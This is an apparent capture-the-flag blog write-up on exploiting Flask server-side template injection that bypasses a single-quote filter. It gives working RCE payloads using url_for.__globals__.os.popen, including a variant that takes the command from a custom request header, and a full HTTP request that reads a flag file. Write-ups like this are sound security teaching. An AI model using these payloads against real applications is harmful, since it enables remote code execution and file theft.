In this blog , I would like to showcase how you can successfully exploit a Server-side template injection without using single quotes.

Hello, everyone! Today, I’m going to demonstrate how you can exploit a server-side template injection vulnerability, even when certain characters are blacklisted. Let’s get started.

Server-side template injection (SSTI) is a web application vulnerability that allows attackers to exploit templates by injecting malicious payloads.

When developers fail to properly sanitize and validate user inputs, attackers can inject malicious code into the server-side templates and these payloads are then stored and processed on the server, potentially leading to Remote Code Execution (RCE) vulnerabilities.

We are presented with an input field that prompts us to enter our name and, in return, generates a personalized welcome message.

I used an extension called Wappalyzer to identify the technologies used on the website, and it revealed that Flask is being used. To confirm the presence of SSTI, I tested the input field with the classic payload {{7*7}}.

This confirms SSTI, Now we need to craft our payload to exploit this vulnerability.

So, I started creating the payload using the Flask methods I’m familiar with.

My initial Payload : {{url_for.__globals__.os.popen(‘ls’).read()}}

However, this payload didn’t work as expected because the application was filtering out certain characters.

I identified the filtered character by testing each characters one by one,and I found that single quotes(‘) are not allowed.

So I came up with another idea after doing some research on how to construct an SSTI payload without using quotes.

The Idea is to make use of the request method that is available in the flask.

payload: {{url_for.__globals__.os.popen(request.headers.hack).read()}}

Now, we need to supply our executable commands in the request header named ‘hack’. To achieve this, intercept the form’s POST request using Burp Suite and modify the parameters accordingly.

GET /{{url_for.__globals__.os.popen(request.headers.hack).read()}} HTTP/1.1
hack: cat ../flag.txt
Host: chal.pctf.competitivecyber.club:5555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://chal.pctf.competitivecyber.club:5555/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Note: The flag is located in the root of the app, so we navigated one directory down and opened the ‘flag.txt’ file.

Let me break down the methods I used:

1. url_for() - This is a Flask method that enables dynamic modification of links based on URL data.
2. __globals__ - We use globals because I need access to the os module, which is present in the global scope.
3. popen() - This method is used to execute system commands.
4. request.headers.<name_of_the_header> — This retrieves the content of the specified header.
5. read() - This method is used to capture and read the output generated by the popen() method.

FLAG : PCTF(wHOS7H47PoKEmoN)

Server-Side Template Injection (SSTI) is a critical web application vulnerability, and it’s essential for both developers and security professionals to understand how SSTI works and how to prevent it. By following best practices in input validation, output encoding, and security configurations, we can mitigate this vulnerability.

That’s all for today, everyone. I’ll be back soon with another informative write-up. Until then, stay safe and stay secure!